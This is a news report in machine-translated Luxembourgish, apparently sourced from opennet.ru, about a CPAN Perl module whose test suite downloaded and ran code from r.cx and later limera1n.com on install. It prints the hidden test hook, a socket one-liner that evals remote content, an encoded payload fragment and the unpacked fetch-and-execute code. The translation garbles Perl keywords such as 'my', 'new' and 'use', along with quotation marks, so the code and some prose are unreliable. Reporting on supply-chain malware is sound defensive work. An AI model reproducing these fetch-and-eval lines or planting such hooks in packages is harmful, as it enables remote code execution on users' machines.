An engem Perl Package verdeelt duerch de CPAN Verzeichnis , entwéckelt fir automatesch CPAN Moduler op der Flucht ze lueden, béiswëlleg Code. Déi béiswëlleg Insert war am Test Code , déi zënter 2011 verschéckt gëtt.
Et ass bemierkenswäert datt d'Froen iwwer d'Luede vun zweifelhafte Code opgestan sinn zréck an 2016.
Béiswëlleg Aktivitéit kacht erof op e Versuch fir Code vun engem Drëtt-Partei-Server erofzelueden an auszeféieren (http://r.cx:1/) während der Ausféierung vun enger Testsuite, déi beim Installatioun vum Modul gestart gouf. Et gëtt ugeholl datt de Code, deen am Ufank vum externen Server erofgeluede gouf, net béiswëlleg war, awer elo gëtt d'Ufro op d'ww.limera1n.com Domain ëmgeleet, déi säin Deel vum Code fir d'Ausféierung ubitt.
Fir den Download an enger Datei ze organiséieren De folgende Code gëtt benotzt:
meng $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
meng $try = `$^X $prog`;
De spezifizéierte Code verursaacht datt de Skript ausgefouert gëtt , den Inhalt vun deenen op d'Linn reduzéiert gëtt:
benotzt lib do {eval<$b>&&botstrap("RCX")if$b=nei IO::Socket::INET 82.46.99.88.":1″};
Dëst Skript lued de Service benotzen Code vum externen Host r.cx (Zeechencodes 82.46.99.88 entspriechen dem Text "R.cX") an executéiert et am Evalblock.
$ perl -MIO::Socket -e'$b=nei IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Nom Auspackung gëtt déi folgend schlussendlech ausgefouert: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
De problematesche Package ass elo aus dem Repository geläscht ginn. (Perl Auteuren Eroplueden Server), an de Modul Autor Kont ass gespaart. An dësem Fall bleift de Modul nach ëmmer am MetaCPAN Archiv a kann direkt vu MetaCPAN installéiert ginn mat e puer Utilities wéi cpanminus. datt de Package net wäit verdeelt gouf.
Interessant ze diskutéieren an den Auteur vum Modul, deen d'Informatioun ofgeleent huet datt béiswëlleg Code agebaut gouf nodeems säi Site "r.cx" gehackt gouf an erkläert datt hien just Spaass huet, a benotzt perlobfuscator.com net fir eppes ze verstoppen, mee d'Gréisst ze reduzéieren vum Code a vereinfacht seng Kopie iwwer de Clipboard. D'Wiel vum Funktiounsnumm "Botstrap" gëtt erkläert duerch d'Tatsaach datt dëst Wuert "wéi Bot kléngt a méi kuerz ass wéi Bootstrap." Den Auteur vum Modul huet och verséchert datt déi identifizéiert Manipulatiounen keng béiswëlleg Handlungen ausféieren, awer nëmmen d'Luede an d'Ausféierung vum Code iwwer TCP weisen.
Source: opennet.ru